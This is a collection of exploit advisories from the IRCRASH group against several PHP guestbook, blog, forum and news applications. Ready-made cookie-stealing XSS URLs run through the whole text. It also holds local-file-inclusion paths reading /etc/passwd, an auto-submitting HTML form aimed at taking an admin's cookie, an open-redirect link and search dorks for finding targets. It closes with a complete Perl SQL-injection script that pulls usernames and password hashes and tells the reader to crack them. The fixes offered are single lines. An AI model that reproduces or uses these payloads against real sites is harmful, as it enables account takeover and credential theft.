Script : BlackBook v1.0 Type : Multiple XSS Vulnerabilities Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://membres.lycos.fr/eejj33/download/blackbook10.zip XSS 1 : http://Example/blackbook/footer.php?bookCopyright=scriptalert(document.cookie)/script XSS 2 : http://Example/blackbook/footer.php?ver=scriptalert(document.cookie)/script XSS 3 : http://Example/blackbook/header.php?bookName=/title scriptalert(document.cookie)/script XSS 4 : http://Example/blackbook/header.php?bookMetaTags=; scriptalert(document.cookie)/script XSS 5 : http://Example/blackbook/header.php?estiloCSS=; scriptalert(document.cookie)/script Solution : Filter With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrashatgmaildotcom
Lifetype 1.2.7 XSS Vulnerability
Script : Lifetype 1.2.7 Type : XSS Vulnerabilities Discovered by : Dr.Crash Or Khashayar Fereidani Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://garr.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.7.tar.bz2 URL : http://Example/admin.php?op=editArticleCategories Method : Post variable : searchTerms Query For Send : [XSS CODE] Example : Send With Post : scriptalert(document.cookie)/script You Can Get Admin Cookie With It Upload This File And Send This Page For Admin HTML PAGE FOR GET ADMIN COOKIE : html head/head body onLoad=javascript:document.form.submit() form action=http://Example/lifetype/admin.php?op=editArticleCategories; method=POST name=form input type=hidden name=searchTerms value=#x22;#x20; [XSS CODE] /form /body /html Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
vlBook 1.21 (ALL VERSION)
Script : vlBook 1.21 (ALL VERSION) Type : Multiple Remote Vulnerabilities (LFI/XSS) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://home.vlab.info/vlbook_1.21.zip DORK : Powered by vlBook 1.21 #XSS Address : http://example/?l=; scriptalert('xss')/script #LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 TNx : God..
mjguest 6.7 (ALL VERSION) Xss Redirection Vuln
Script : mjguest 6.7 (ALL VERSION) Type : Multiple Remote Vulnerabilities (XSS/REDIRECTION) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.mdsjack.bo.it/files/mjguest_6.7gt.zip #XSS REDIRECT Address : http://example/mjguest/mjguest.php?do=redirectlevel= [XSS CODE]alert=wrong_passgoto=[REDIRECT URL] You Can Get Admin Session With THis Vuln . # For Example : http://example/mjguest/mjguest.php?do=redirectlevel=scriptalert(document.cookie)/scriptalert=wrong_passgoto=http://ircrash.com TNx : God.. Khashayar Fereidani Email : [EMAIL PROTECTED]
php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)
Script : php-addressbook v2.0 Type : Multiple Remote Vulnerabilities (LFI/XSS) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr DORK : php-addressbook v2.0 - Refreshed #XSS Address : http://Example/pad/?username=; scriptalert(document.cookie)/script #LFI Address : http://Example/pad/index.php?skin=../[FILENAME]$00 TNx : God.. Khashayar Fereidani Email : irancrash[At]Gmail.com
Minibb 2.2a XSS Vulnerability
# Minibb 2.2a XSS Vulnerability # # # #AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr # # # #Script Download : http://www.minibb.net/ # # # # #XSS # #XSS Address : http://example/bb_admin.php?action=searchusers2whatus=; / scriptalert(document.cookie)/scriptsearchus=id # # # You Can Get Admin Cookie With This Vuln # # # # # Site : Http://IRCRASH.COM # #TNX GOD#
Datalife Engine 6.7 XSRF
# Datalife Engine 6.7 XSRF Vulnerability By IRCRASH # # # #Discovered by : IRCRASH (R3d.w0rm) # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # # # # #Script Download : http://datalifecms.ir/download/DatalifeEngine6.7.zip # # # # XSRF # #XSRF Address : http://site.com/datalife-path/engine/modules/imagepreview.php?image=[XSRF] # # # # Our site : Http://IRCRASH.COM # #
EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
#!/usr/bin/perl # EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI) # # # #Discovered by : IRCRASH By Dr.Crash # #Exploited By : Dr.Crash # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # # # # #Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip # # # # #XSS # #XSS Address : http://Sitename/staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_pupublishread=scriptalert(document.cookie);/script # # # #SQL # #SQL Address : http://Sitename/dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers # # # #LFI # #SQL Address : http://Sitename/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00 # # # # Our site : Http://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print * EasyNews-40tr Sql Injection exploit* *AUTHOR : IRCRASH * *Discovered by : IRCRASH TEAM BY Dr.Crash * *Exploited by : IRCRASH TEAM BY Dr.Crash * *Our Site : IRCRASH.COM* ; } sub usage { print * Usage : perl $0 -url http://Sitename/ ; } my %parameter = (); GetOptions(\%parameter, url=s); $url = $parameter{url}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} $vul = /dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers; sub Exploit() { $requestpage = $url.$vul; print Requesting Page is .$url.\n; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print Username: .$name.\n; print Password: .$password.\n\n; print Crack Md5 Password And Login In : $url/admin/\n; print Enjoy My friend